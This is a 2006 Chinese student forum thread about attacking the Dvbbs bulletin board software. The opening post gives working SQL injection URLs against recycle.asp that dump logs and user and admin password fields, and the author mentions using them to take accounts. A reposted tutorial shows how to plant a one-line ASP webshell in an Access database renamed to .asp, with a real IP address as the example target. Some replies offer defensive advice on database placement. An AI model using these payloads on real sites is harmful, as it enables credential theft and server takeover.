碧海潮声大学生网

标题: 〖分享〗几个暴动网数据库的代码 [打印本页]

作者: starshow0571 时间: 2006-8-24 13:14
标题: 〖分享〗几个暴动网数据库的代码
前阵看到llikz的一个大作，获得动网前台管理员后暴log日志的方法。文章题目是《夏日动网“洞”不断》，呵呵，大家网络自行搜索。

recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_conte nt,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%2 01,1,1,1,1,1%20from%20dv_bbs1

然后网络上出现了暴出全部日志的语句，真的棒极了。

recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_conte nt,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20 select%201,1,1,1,1,1%20from%20dv_bbs1

关于使用方法不多啰唆咯，网络上实在太多。

然后在我一次拿帐号的过程中发现有个站的日志全被清空了，比较郁闷，于是修改了一下暴字段内容的语句，帖出来方便下不熟悉的朋友

暴前台所有用户：

recycle.asp?tablename=dv_bbs1%20union%20select%201,2,usernam e,userpassword,5,6%20from% 20dv_user%20where%20userid>0%20union%20select%201,1,1,1,1 ,1%20from%20dv_bbs1

暴后台所有用户：

recycle.asp?tablename=dv_bbs1%20union%20select%201,2,usernam e,password,5,6%20from%20dv_user%20where%20l_id>0%20union% 20select%201,1,1,1,1,1%20from%20dv_bbs1文字 [s:49]

作者: 笨笨啊 时间: 2006-9-2 20:58
如果把mdb放在web根目录之外，就算暴露了也没有什么大的意义了。这个是一个简单的安全意识

作者: starshow0571 时间: 2006-9-2 21:31

引用第1楼笨笨啊于2006-09-02 20:58发表的“”:
如果把mdb放在web根目录之外，就算暴露了也没有什么大的意义了。这个是一个简单的安全意识

database?

作者: 笨笨啊 时间: 2006-9-2 22:37
呵呵，一般，如果是文件数据库，防下载有这么几种方法
1.取消IIS的该类型文件注册，就是修改meta头，使其输入这个网址时，会出现404错误，这样是无法通过web下载的
2.将文件上传到web目录之外，如一般的空间商都会给出三个目录
web,data,log
web目录是网页根目录，只要放在data目录下，就不存在一个URL能指向该文件了，除非使用木马
3.同上，但用DSN来指向文件。而DSN是存放在注册表中的，这样更不能取得其真实地址了
4.很古老的方法，就是像后缀改成asp，并增加防下载代码。。其实还不如改成一个IIS不认可的后缀更安全。这个是一般菜鸟所喜爱的下载文件

^

作者: starshow0571 时间: 2006-9-2 23:17

引用第3楼笨笨啊于2006-09-02 22:37发表的“”:
呵呵，一般，如果是文件数据库，防下载有这么几种方法
1.取消IIS的该类型文件注册，就是修改meta头，使其输入这个网址时，会出现404错误，这样是无法通过web下载的
2.将文件上传到web目录之外，如一般的空间商都会给出三个目录
web,data,log
web目录是网页根目录，只要放在data目录下，就不存在一个URL能指向该文件了，除非使用木马
.......

.取消IIS的该类型文件注册，就是修改meta头怎么取消和修改啊?有FTP权限可以么?

将文件上传到web目录之外，如一般的空间商都会给出三个目录
web,data,log                         呵呵,有些还多个other吧!

web目录是网页根目录，只要放在data目录下，就不存在一个URL能指向该文件了
                        这个方法不错!

作者: starshow0571 时间: 2006-9-2 23:22
同上，但用DSN来指向文件。而DSN是存放在注册表中的，这样更不能取得其真实地址了
DSN不了解! [s:43]
很古老的方法，就是像后缀改成asp，并增加防下载代码。。其实还不如改成一个IIS不认可的后缀更安全。这个是一般菜鸟所喜爱的下载文件
这个改后缀ASP不好啊,很危险的!会有灾难来的!
而且改ASP这个着数早就被人知道了,别人用迅雷一下载,再改回后缀照样拿到数据库!呵呵!

作者: starshow0571 时间: 2006-9-2 23:23
改MDB为ASP所带来的灾难
可能是随着网络安全技术的发展吧，管理员的素质都在提高，在使用access+asp系统时，为不数据库被人下载，到把mdb改为asp或asa。先不说直接改后缀，直接可以用网快等工具直接下载，其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。
1．思路
大家都知道<％%>为asp文件的标志符，也就是说一个asp文件只会去执行<% %>之间的代码，access＋asp的web系统的所有数据都是存放在数据库文件里（mdb文件），由于管理者把mdb文件改为了asp文件，如果我们提交的数据里包含有<%%>，那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库，那么asp后缀的数据库就是我们的webshell了。
2．示例
随便找个目标，首先我们暴库，看是不是asp后缀的数据库：
<http://220.170.151.103/test/dlog ... &log_id=210>
返回：
Microsoft VBScript 编译器错误错误 '800a03f6' 缺少 'End' /iisHelp/common/500-100.asp，行?4 Microsoft JET Database Engine 错误 '80004005' 'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。 /test/conn.asp，行?
我们提交：<http://220.170.151.103/test/dlog ... og_mdb%2529.asp>返回一堆的乱码，这样我们可以直接用网际快车等工具直接下载数据库（这里我们不讨论）。我们回到主页看到有提供“网友评论”功能。我们注册个用户，发一条评论：
<%execute request("b")%>
这样我们就把asp代码：<%execute request("b")%>写入了数据库，那么数据库：就是我们的webshell咯。提交：<http://220.170.151.103/test/dlog ... og_mdb%2529.asp>在乱码的最后我们看到：
/iisHelp/common/500-100.asp，行?4 Microsoft VBScript 运行时错误错误 '800a000d' 类型不匹配配: 'execut /test/dlog/log_mdb/%29dlog_mdb%29.asp，行?26
哈哈，我们的插入的代码运行了。如下图：
注意：我们在向数据库提交代码时，代码内容不可以太大。所以我们采用<%execute request("b")%>。
3．其他一些问题和思路
１．对于改了后缀为asp，还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库，由于里面存在了非法的asp代码，插入我们的webshell代码后运行，将只会显示前面非法代码的错误，而不去执行我们shell的代码。虽然这样可以防止一定的攻击，但还是存在一定的隐患，我们只要在出错的代码前加入兼容错误的代码，就可以得到正确显示执行我们插入的webshell代码了。
２．对于没有改后缀的，也就是mdb文件，这样我们可以先直接下载下来得到后台密码，进了后台，可以利用数据库备用改后缀为asp。
相关附件:改mdb为asp所带来的灾难.doc
http://4ngel.net/blog/hei/attachment.php?id=2

作者: 笨笨啊 时间: 2006-9-2 23:46

引用第5楼starshow0571于2006-09-02 23:22发表的“”:
同上，但用DSN来指向文件。而DSN是存放在注册表中的，这样更不能取得其真实地址了
DSN不了解! [s:43]
很古老的方法，就是像后缀改成asp，并增加防下载代码。。其实还不如改成一个IIS不认可的后缀更安全。这个是一般菜鸟所喜爱的下载文件
这个改后缀ASP不好啊,很危险的!会有灾难来的!
而且改ASP这个着数早就被人知道了,别人用迅雷一下载,再改回后缀照样拿到数据库!呵呵!

呵，我说的就是这个啊，改asp照样会下载：）

所以一般推荐是用web外的目录，这个只要有ftp权限就行了
而meta文件类型则需要有空间的IIS管理权才行。或者可以让管理员删除某种格式后缀的文件头，这样再把数据库后缀改成那个就行了

DSN的话你就算下载了源代码，或是所谓暴库了，也只能看到DSN的名称，而不知道它所表示的数据源在哪里

欢迎光临碧海潮声大学生网 (http://www.zjoubbs.com/)